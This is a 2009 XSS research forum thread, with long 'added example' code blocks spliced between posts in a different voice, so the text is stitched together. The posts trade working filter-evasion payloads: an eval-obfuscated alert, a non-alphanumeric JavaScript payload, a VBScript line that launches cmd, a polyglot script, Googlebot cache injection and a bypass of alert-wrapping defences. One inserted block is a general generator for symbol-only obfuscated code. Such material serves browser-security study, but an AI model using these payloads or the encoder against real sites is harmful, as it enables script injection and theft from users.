Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Current Page: 14 of 16
Re: New XSS vectors/Unusual Javascript
Posted by: Robert Chapin
Date: April 05, 2009 06:17PM

Anonymous Googlebot Injection

Consider situations in which agents should *never* treat an HTTP response as an HTML entity. Examples include response headers "Content-Disposition: attachment" which indicates the entity is not same-origin, and "Content-Type: application/binary" which indicates the entity is executable or has no format.

According to Google's own documentation http://code.google.com/p/browsersec/wiki/Part2#Content_handling_mechanisms the latter situation is handled correctly by all modern web browsers.

It is not handled correctly by Googlebot.

Proof of concept: http://www.google.com/search?q=site%3Aforums.xmbforum.com+%22Cross-Site+Scripting+With+Content+Disposition%22&filter=0 Click on the links I posted there and you will only get a download prompt. Click on one of the Google cached copies and you get XSS. In fact, I'm not aware of any way to prevent Googlebot from doing this.

The potential for a self-propagating Googlebomb is mind boggling.

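The header rule the post describes, as an added example that is not code from the thread: a small classifier that decides from response headers alone whether a conforming user agent may interpret the body as an HTML document. It parses Content-Disposition properly (case-insensitive type, quoted parameter values that may themselves contain semicolons) and strips parameters from Content-Type before comparing. The header sets at the bottom are constructed for the demonstration; the header names and values are the only things it knows about, which is exactly what an intermediary that re-serves a cached body inside its own page throws away.

```javascript
// Added example (not from the thread): decide from response headers alone
// whether a conforming user agent may treat the body as an HTML document.

// Case-insensitive lookup over [name, value] pairs; null if absent.
function getHeader(headers, name) {
  const want = name.toLowerCase();
  const hit = headers.find(([n]) => n.toLowerCase() === want);
  return hit ? hit[1] : null;
}

// Split a header value on ";" outside quoted-strings, unquoting as we go, so
// `attachment; filename="a;b.html"` yields ["attachment", " filename=a;b.html"].
function splitParams(value) {
  const parts = [];
  let cur = "", quoted = false;
  for (let i = 0; i < value.length; i++) {
    const c = value[i];
    if (quoted && c === "\\" && i + 1 < value.length) cur += value[++i];
    else if (c === '"') quoted = !quoted;
    else if (c === ";" && !quoted) { parts.push(cur); cur = ""; }
    else cur += c;
  }
  parts.push(cur);
  return parts;
}

// 'Attachment; Filename="x.html"' -> { type: "attachment", params: { filename: "x.html" } }
function parseContentDisposition(value) {
  if (value === null) return null;
  const [type, ...rest] = splitParams(value);
  const params = {};
  for (const part of rest) {
    const eq = part.indexOf("=");
    if (eq > 0) params[part.slice(0, eq).trim().toLowerCase()] = part.slice(eq + 1).trim();
  }
  return { type: type.trim().toLowerCase(), params };
}

// "Text/HTML; charset=utf-8" -> "text/html"
function mediaType(contentType) {
  return contentType === null ? null : splitParams(contentType)[0].trim().toLowerCase();
}

const HTML_TYPES = new Set(["text/html", "application/xhtml+xml"]);

// { render, reason }: render is true only when an agent may parse the body as HTML.
function classifyResponse(headers) {
  const cd = parseContentDisposition(getHeader(headers, "Content-Disposition"));
  if (cd && cd.type === "attachment") {
    return { render: false, reason: "Content-Disposition: attachment, download only" };
  }
  const type = mediaType(getHeader(headers, "Content-Type"));
  if (type === null) {
    // No declared type at all: the agent falls back to sniffing the body.
    return { render: true, reason: "no Content-Type, body may be sniffed as HTML" };
  }
  return HTML_TYPES.has(type)
    ? { render: true, reason: "declared " + type }
    : { render: false, reason: "declared non-HTML type " + type };
}

// Constructed header sets for the demonstration.
const SAMPLES = {
  attachment: [["Content-Type", "text/html"], ["Content-Disposition", 'attachment; filename="evil.html"']],
  binary: [["content-type", "application/binary"]],
  inlineHtml: [["Content-Type", "Text/HTML; charset=utf-8"], ["Content-Disposition", "inline"]],
  untyped: [],
};

// Sample name -> render decision for every constructed header set.
function classifyAll() {
  const out = {};
  for (const [name, headers] of Object.entries(SAMPLES)) out[name] = classifyResponse(headers).render;
  return out;
}
```

Point the same function at a site's real responses (a fetch of each URL's headers) to find pages that are served as attachments or binaries yet would be rendered by any agent that keeps only the body.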
Re: New XSS vectors/Unusual Javascript
Posted by: skymuss
Date: April 06, 2009 04:49AM

I think that is a nice one

v=(/t/+[])[1];   // "/t/"[1] -> "t": each regex literal is coerced to its source text
x=(/r/+[])[1];   // "r"
y=(/o/+[])[1];   // "o"
z=(/C/+[])[1];   // "C"
d=(/./+[])[1];   // "."
o=(/n/+[])[1];   // "n"
i=(/i/+[])[1];   // "i"
t=String(v+y);   // "to"
s=String((/S/+[])[1]+v+x+i+o+(/g/+[])[1]);   // "String"
a=String(d+(/f/+[])[1]+x+y+(/m/+[])[1]+z+(/h/+[])[1]+(/a/+[])[1]+x+z+y+(/d/+[])[1]+(/e/+[])[1]);   // ".fromCharCode"
j=String((/j/+[])[1]+y+i+o);   // "join" (built but never used)
e=self[490837[t+s](32)];   // 490837["toString"](32) === "eval", so e is self.eval
c=e(s+a);   // eval("String.fromCharCode") returns the function itself
e(c(97)+c(108)+c(101)+c(114)+c(116)+c(40)+c(39)+c(79)+c(119)+c(110)+c(101)+c(100)+c(32)+c(98)+c(121)+c(32)+c(84)+c(101)+c(97)+c(109)+c(32)+c(78)+c(48)+c(48)+c(66)+c(33)+c(39)+c(41));   // eval("alert('Owned by Team N00B!')")

skymuss

Re: New XSS vectors/Unusual Javascript
Posted by: rvdh
Date: April 06, 2009 09:48AM

@Robert Chapin

Yeah, it is an interesting idea; I pondered this myself a few times as well. Abusing the GoogleBot is still fairly un-researched, not to mention abusing the Google Spider to programmatically redirect it upon entry and let it loop between pages or two sites; I wonder how it will react to that. ;-)

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: April 06, 2009 10:07AM

@Robert Chapin @rvdh

I've seen the GoogleBot used for XSS and SQL injection attacks against my own sites. I agree with Ronald that this is an under-researched area.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: April 06, 2009 02:28PM

eval(new Array(new Array(new Array(new Array('aler'))))+Array('t')+[]+Array(Array(Array('(1)'))))


Re: New XSS vectors/Unusual Javascript
Posted by: Kyo
Date: April 07, 2009 07:05AM

Note that the Google cache version also links to a "text-only" version, which will not execute the JavaScript:
http://209.85.129.132/search?q=cache:w790MtEFa5kJ:forums.xmbforum.com/files.php%3Fpid%3D1361320%26aid%3D20274+site:forums.xmbforum.com+%22Cross-Site+Scripting+With+Content+Disposition%22&hl=en&strip=1

That doesn't really change anything, of course. Just sayin'

Re: New XSS vectors/Unusual Javascript
Posted by: Ivan
Date: April 07, 2009 04:57PM

VBScript one-liner (run CMD):

Dim a : Dim b : a = chr(87) + chr(83) + chr(99) + chr(114) + chr(105) + chr(112) + chr(116) + chr(46) + chr(83) + chr(104) + chr(101) + chr(108) + chr(108) : b = chr(99) + chr(109) + chr(100) : CreateObject(a).Run b

http://www.security-net.biz/



Edited 1 time(s). Last edit at 04/07/2009 04:58PM by Ivan.

Re: New XSS vectors/Unusual Javascript
Posted by: Robert Chapin
Date: April 07, 2009 06:51PM

corollary : Google Language Tools + Anonymous Googlebot Injection = More XSS

Proof of concept: http://translate.google.com/translate?u=http%3A%2F%2Fforums.xmbforum.com%2Ffiles.php%3Fpid%3D1361320%26aid%3D20275&sl=en&tl=es&hl=en&ie=UTF-8

Edit: Don't be fooled by the frameset in there. The demonstration simply shows the payload need not be cached or indexed.



Edited 3 time(s). Last edit at 04/07/2009 07:15PM by Robert Chapin.

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: April 08, 2009 03:44AM

http://www.thespanner.co.uk/2009/04/08/onreadystatechange/


Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: April 08, 2009 05:06AM

Can this be beaten?

http://www.thespanner.co.uk/2009/04/08/overwriting-native-functions-in-javascript/


Re: New XSS vectors/Unusual Javascript
Posted by: ma1
Date: April 08, 2009 07:21AM

Gareth Heyes Wrote:
-------------------------------------------------------
> Can this be beaten?
>
> http://www.thespanner.co.uk/2009/04/08/overwriting
> -native-functions-in-javascript/

Yes, it can be beaten quite easily:
try { // Firefox
  delete window.alert;
} catch(e) { // IE
  with(document) window.alert = body.appendChild(createElement("frame")).contentWindow.alert;
}

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

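What ma1's two branches exploit, as an added example that is not code from the thread: a function assigned onto a window only shadows whatever sits behind it, and a fresh frame's window starts clean. The plain object standing in for a Window, with the native alert on its prototype, is an assumption that matches the Firefox behaviour ma1's delete relied on; current browsers keep alert as an own property of the window object, where delete removes it outright rather than restoring it. The non-configurable variant shows what Object.defineProperty changes, and what it cannot.

```javascript
// Added example, not code from the thread. A plain object stands in for a
// browser window (an assumption): the native alert lives on its prototype,
// as it did in the Firefox that ma1's delete trick targeted.
const NATIVE_ALERT = function alert(msg) { return "native:" + msg; };

// Every window, including one belonging to a freshly appended frame, starts
// with the untouched native reachable through its prototype chain.
function newWindow() {
  return Object.create({ alert: NATIVE_ALERT });
}

// Gareth's defence: a wrapper that stops forwarding to the native after
// `limit` calls. Plain assignment only creates an own property on the
// window that shadows the prototype's.
function wrapByAssignment(win, limit) {
  const native = win.alert;
  let calls = 0;
  win.alert = function (msg) { return calls++ < limit ? native(msg) : undefined; };
  return win;
}

// The same wrapper installed as a non-writable, non-configurable own
// property: neither reassignment nor delete can remove it from this window.
function wrapByDefineProperty(win, limit) {
  const native = win.alert;
  let calls = 0;
  Object.defineProperty(win, "alert", {
    value: function (msg) { return calls++ < limit ? native(msg) : undefined; },
    writable: false, configurable: false, enumerable: true,
  });
  return win;
}

// ma1's Firefox branch: delete the shadowing property and the prototype's
// native shows through again. Reflect.deleteProperty reports success
// instead of throwing in strict mode.
function bypassByDelete(win) {
  const removed = Reflect.deleteProperty(win, "alert");
  return { removed, alert: win.alert };
}

// Overwriting the wrapper directly; Reflect.set reports whether it took.
function bypassByAssign(win, fn) {
  const set = Reflect.set(win, "alert", fn);
  return { set, alert: win.alert };
}

// ma1's IE branch: a new frame's window has its own untouched alert, and
// nothing done to `win`'s properties reaches it.
function bypassByFreshFrame() {
  return newWindow().alert;
}
```

After wrapByAssignment, bypassByDelete hands back the native; after wrapByDefineProperty, both delete and assignment report failure and the call cap holds, but bypassByFreshFrame still returns the native, which is the second half of ma1's reply and has no counterpart defence on this page.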
Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: April 08, 2009 07:32AM

Damn my stupidity, I will learn to stop trying soon.


Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: April 08, 2009 07:39AM

setTimeout(
-
+
1
+
/[ + - ~ alert//gsdfgdfg\
(1)]/
+
-
+ 1)


Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: April 09, 2009 04:39AM

Here's how to use FF constants within a new function and .toSource to make FF protect functions. The slice is used to remove the const declaration afterwards, but it is illegal to redeclare alert.

eval(new Function('const alert=function(native){var counter = 0;return function(str) {if(counter < 10) {native(str);}counter++;}}(window.alert);delete alert;alert(alert)').toSource(2).slice(36).slice(0,-1));


Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: April 09, 2009 10:28AM

o={b setter:Function}.b='alert\x28\x31\x29'
new o

Or if you prefer:-
new({b setter:Function}.b='alert\x28\x31\x29')




Edited 1 time(s). Last edit at 04/09/2009 10:31AM by Gareth Heyes.

Re: New XSS vectors/Unusual Javascript
Posted by: thornmaker
Date: April 09, 2009 11:55AM

Gareth Heyes Wrote:
-------------------------------------------------------
> o={b setter:Function}.b='alert\x28\x31\x29'
> new o
>
> Or if you prefer:-
> new({b setter:Function}.b='alert\x28\x31\x29')


Awesome! I love seeing this deprecated setter notation abused :)

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: April 09, 2009 12:28PM

@thornmaker

Thing is they've stopped native assignments this way but using Function still works :) Please invent some more custom syntax Mozilla I like it


Re: New XSS vectors/Unusual Javascript
Posted by: Anonymous User
Date: April 19, 2009 07:46PM

http://gim.constructor.com/self?foo=bar[top]:true

:)

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: May 08, 2009 06:10PM

I love being right when I thought I was wrong.

http://www.thespanner.co.uk/2009/05/08/opera-xss-vectors/


Re: New XSS vectors/Unusual Javascript
Posted by: wpulog
Date: May 13, 2009 04:27AM

<%<!--'%><script>alert("XSS");</script>-->

----------------------------------------------

http://www.pulog.org

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: May 13, 2009 08:08AM

@wpulog

Nice I like it


Re: New XSS vectors/Unusual Javascript
Posted by: Kyo
Date: May 13, 2009 08:23AM

Not working for me in FF.

http://wocares.com/xsstester.php?yxss=1&xss=%3C%25%3C!--%27%25%3E%3Cscript%3Ealert(%22XSS%22)%3B%3C%2Fscript%3E--%3E+&order_0=0&maxlen=0&order_1=10&s11=&s12=&order_2=20&r11=&r12=&order_3=30&order_4=40&order_5=50&order_6=60&order_7=70&order_8=80&order_9=90&order_10=100&order_11=110&order_12=120&order_13=130&order_14=140&s21=&s22=&order_15=150&r21=&r22=&order_16=160&r31=&r32=&order_17=170&enviroment=%5Bcont%5D&headers=



Edited 1 time(s). Last edit at 05/13/2009 08:24AM by Kyo.

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: May 13, 2009 08:54AM

Worked for me in IE


Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: June 01, 2009 04:42PM

FF-only vector, hehe

<body onload=&lt;!--&#10alert(1)>


Re: New XSS vectors/Unusual Javascript
Date: June 01, 2009 10:22PM

No alnum, only symbols.

Tested on Firefox; does not work on IE.

//-----------------------------------------------------------------------------
_=[]|[];$=_++;__=(_<<_);___=(_<<_)+_;____=__+__;_____=__+___;$$=({}+"")[_____]+
({}+"")[_]+({}[$]+"")[_]+(($!=$)+"")[___]+(($==$)+"")[$]+(($==$)+"")[_]+(($==$)
+"")[__]+({}+"")[_____]+(($==$)+"")[$]+({}+"")[_]+(($==$)+"")[_];$$$=(($!=$)+""
)[_]+(($!=$)+"")[__]+(($==$)+"")[___]+(($==$)+"")[_]+(($==$)+"")[$];$_$=({}+"")
[_____]+({}+"")[_]+({}+"")[_]+(($!=$)+"")[__]+({}+"")[__+_____]+({}+"")[_____]+
({}+"")[_]+({}[$]+"")[__]+(($==$)+"")[___]; ($)[$$][$$]($$$+"('"+$_$+"')")();

--
Yosuke HASEGAWA
http://utf-8.jp/

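The general form of Yosuke's trick, as an added example rather than code from the thread: a generator that spells any string out of the same coerced values his post indexes ("[object Object]", "true", "false", "undefined", plus "NaN", "Infinity" and the digits), wraps code in `[]["filter"]["constructor"]` the way the post uses `($)[$$][$$]` to reach Function, and checks that the result really contains no alphanumerics. Characters that no coerced string provides are written as `\uXXXX` escapes, which JavaScript accepts inside identifiers and string literals but not in keywords or operators. The source list and the digit trick are the assumptions here; everything else follows from how the engine stringifies those values.

```javascript
// Added example, not code from the thread: the general form of Yosuke's trick.
// Every alphanumeric is pulled out of a string that JavaScript coerces from a
// symbol-only expression; anything else is a plain quoted literal.
const ALNUM = /[A-Za-z0-9]/;

// Integer n with no alphanumerics: 0 -> +[], 1 -> +!![], n -> !![]+!![]+...
function numExpr(n) {
  if (n === 0) return "+[]";
  if (n === 1) return "+!![]";
  return Array(n).fill("!![]").join("+");
}

// Symbol-only expressions and the strings they evaluate to (assumed set).
const SOURCES = [
  "({}+[])",        // "[object Object]"
  "(!![]+[])",      // "true"
  "(![]+[])",       // "false"
  "([][[]]+[])",    // "undefined"
  "(+[![]]+[])",    // "NaN"
  "(+!![]/+[]+[])", // "Infinity"
];
for (let d = 0; d <= 9; d++) SOURCES.push(`(${numExpr(d)}+[])`); // "0".."9"

// Map each reachable alphanumeric to source[index]; the first hit wins.
function buildAlphabet() {
  const map = Object.create(null);
  for (const src of SOURCES) {
    const str = eval(src); // let the engine produce the coerced string
    for (let i = 0; i < str.length; i++) {
      if (ALNUM.test(str[i]) && !(str[i] in map)) map[str[i]] = `${src}[${numExpr(i)}]`;
    }
  }
  return map;
}
const ALPHABET = buildAlphabet();

const isPrintableSymbol = (c) => !ALNUM.test(c) && c >= " " && c <= "~";

// A string as a concatenation of symbol-only terms. Throws on characters that
// no source provides (g, h, k, m, p, q, v, w, x, z, most capitals, non-ASCII).
function encodeString(s) {
  const terms = [];
  for (const c of s) {
    if (c in ALPHABET) terms.push(ALPHABET[c]);
    else if (isPrintableSymbol(c)) terms.push(JSON.stringify(c));
    else throw new Error("no symbol-only source for " + JSON.stringify(c));
  }
  return terms.length ? `(${terms.join("+")})` : "([]+[])";
}

// Before handing source code to Function(), spell unreachable characters as
// \uXXXX escapes: valid in identifiers and string literals, not in keywords.
function escapeMissing(code) {
  let out = "";
  for (let i = 0; i < code.length; i++) {
    const c = code[i];
    if (c in ALPHABET || isPrintableSymbol(c)) out += c;
    else out += "\\u" + code.charCodeAt(i).toString(16).padStart(4, "0");
  }
  return out;
}

// [][ "filter" ][ "constructor" ] is Function, as ($)[$$][$$] is in the post;
// calling the result runs `code` as a function body.
function encodeCode(code) {
  const fn = `[][${encodeString("filter")}][${encodeString("constructor")}]`;
  return `${fn}(${encodeString(escapeMissing(code))})()`;
}

const isNonAlphanumeric = (s) => !ALNUM.test(s);
```

encodeCode("alert('cool code')") reproduces the post's payload; encodeCode("return [].map.length + 41") shows the escape path for m, p, g and h inside identifiers. The same construction is what the contest question that follows is really about: the output length is dominated by the index expressions, so shorter payloads come from characters that sit near the front of a source string.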
Re: New XSS vectors/Unusual Javascript
Posted by: thornmaker
Date: June 01, 2009 10:54PM

Nice one, Yosuke. I wonder what the shortest non-alphanumeric code is that is the same as: eval(name)

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: June 02, 2009 02:13AM

Yosuke sweet! More please


Re: New XSS vectors/Unusual Javascript
Posted by: Anonymous User
Date: June 02, 2009 03:47AM

Very nice indeed! Time for a new contest? ;)

Re: New XSS vectors/Unusual Javascript
Posted by: Gareth Heyes
Date: June 02, 2009 03:59AM

Shortest alert(1) without using alphanum chars?


Re: New XSS vectors/Unusual Javascript
Date: June 02, 2009 04:09AM

Polyglot script.
Works as VBScript on IE and as JavaScript on other browsers.
--
<script la[0x00]nguage="vbscript" language="javascript">
rem = null; foo = function( msg ){
rem /*
Function foo( msg )
rem */ MsgBox = alert;
MsgBox(msg)
rem /*
End Function : rem */ }
</script>
...
<script la[0x00]nguage="vbscript" language="javascript">
foo("abcd")
</script>
--
